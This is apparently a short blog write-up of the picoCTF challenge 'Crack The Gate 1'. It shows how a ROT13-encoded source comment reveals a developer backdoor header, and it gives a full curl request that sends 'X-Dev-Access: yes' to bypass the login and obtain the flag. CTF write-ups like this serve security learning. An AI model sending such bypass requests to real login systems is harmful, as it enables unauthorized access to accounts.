Skip to content
Go back

picoCTF Crack The Gate 1

problem statement

This is the problem statement, where I have been given an email id ctf-player@picoctf.org. I have to find the password or a way to bypass the authorization.

I input random data as password and checked the network log, I found that it is post request to /login.

invalid credentials

I checked the source view of the website (cuz it’s always good to do that), and I found text that looks like rot13 encoded.

rot13encode

Now, by decoding this text I get somethign interesting. It says

NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes"

Now I know this is Authentication Bypass via Backdoor Header, so I did copied cURL added the header X-Dev-Access: yes

curl 'http://amiable-citadel.picoctf.net:57898/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-GB,en;q=0.8' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/json' \
  -H 'Origin: http://amiable-citadel.picoctf.net:57898' \
  -H 'Referer: http://amiable-citadel.picoctf.net:57898/' \
  -H 'Sec-GPC: 1' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36' \
  -H 'X-Dev-Access: yes' \
  --data-raw '{"email":"ctf-player@picoctf.org","password":"wfpwf"}' \
  --insecure | jq

and booyeah, I get the flag.

untitled


Share this post on:

Next Post
picoCTF hidden in the plainsight